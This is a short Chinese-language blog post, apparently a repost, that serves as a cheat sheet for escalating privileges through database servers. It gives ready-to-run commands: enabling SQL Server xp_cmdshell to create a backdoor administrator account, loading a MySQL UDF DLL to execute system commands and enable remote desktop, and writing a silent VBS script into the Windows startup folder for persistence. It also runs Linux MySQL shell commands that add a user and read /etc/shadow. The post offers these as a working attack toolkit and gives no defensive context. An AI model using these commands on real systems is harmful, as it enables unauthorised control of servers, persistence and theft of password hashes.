滲透之——資料庫提權

冰 河發表於2019-01-04

轉載請註明出處:https://blog.csdn.net/l1028386804/article/details/85768994

一、SQL Server提權

1.啟用或關閉xp_cmdshell

--啟用xp_cmdshell
USE master 
EXEC sp_configure 'show advanced options', 1 
RECONFIGURE WITH OVERRIDE 
EXEC sp_configure 'xp_cmdshell', 1 
RECONFIGURE WITH OVERRIDE 
EXEC sp_configure   'show advanced options', 0
RECONFIGURE WITH OVERRIDE 
 
 
--關閉xp_cmdshell
USE master 
EXEC sp_configure 'show advanced options', 1 
RECONFIGURE WITH OVERRIDE 
EXEC sp_configure 'xp_cmdshell', 0 
RECONFIGURE WITH OVERRIDE 
EXEC sp_configure   'show advanced options', 0
RECONFIGURE WITH OVERRIDE 

2.新增使用者

Exec master.dbo.xp_cmdshell 'net user liuyazhuang lyz123 /add'

3.將使用者新增到管理員組

Exec master.dbo.xp_cmdshell 'net localgroup administrators liuyazhuang /add'

4.通過xp_cmdshell exec檢視系統使用者

Exec master.dbo.xp_cmdshell 'net user'

5.遠端終端登入

命令列執行mstsc開啟遠端終端,輸入IP地址和剛才新增的使用者名稱和密碼,登入即可。

另外,通過資料庫備份,將批處理命令備份到啟動資料夾下,系統重啟後就會自動執行批處理命令,也能達到提權的效果。

二、MySQL提權

1.將udf.dll檔案匯出到預設的外掛目錄下

2.UDF提權的常用命令

create function cmdshell returns string soname 'udf.dll';
select cmdshell('net user liuyazhuang lyz123 /add');
select cmdshell('net localgroup administrators liuyazhuang /add');
select cmdshell('net localgroup administrators');
select cmdshell('ipconfig/all');
select cmdshell('net user');
select cmdshell('regedit /s d:\wwwroot\3389.reg');
drop function cmdshell;
select cmdshell('netstat -an');

3.VBS啟動項

先通過WebShell連線資料庫,通過建立表a將VBS指令碼寫入表中,然後匯入啟動項。該指令碼僅對中文版有效,如果使用其他語言版本的作業系統,僅需對"C:\\Documents and Settings\\All Users\\[開始]選單\\程式\\啟動\\a.vbs"這個指令碼進行相應更改。在VBS指令碼後面有一個"0",表示不彈出CMD視窗,以靜默模式執行。該方法是在通過UDF提權失敗的情況下,將VBS插入啟動項中,待系統重啟後將自動新增一個使用者,示例如下:

create table a (cmd text);
insert into a values("set wshshell=createobject(""wscript.shell"") " );
insert into a values("a=wshshell.run(""cmd.exe /c net user liuyazhuang lyz123 /add"",0) " );
insert into a values("b=wshshell.run(""cmd.exe /c net localgroup administrators liuyazhuang /add"",0) " );
select * from a into outfile "C:\\Documents and Settings\\All Users\\[開始]選單\\程式\\啟動\\a.vbs";

三、Linux下的MySQL提權

mysql -hlocalhost -uroot -p
system useradd hacker
system passwd hacker
system tail -l /etc/passwd
system tail -l /etc/shadow

 

相關文章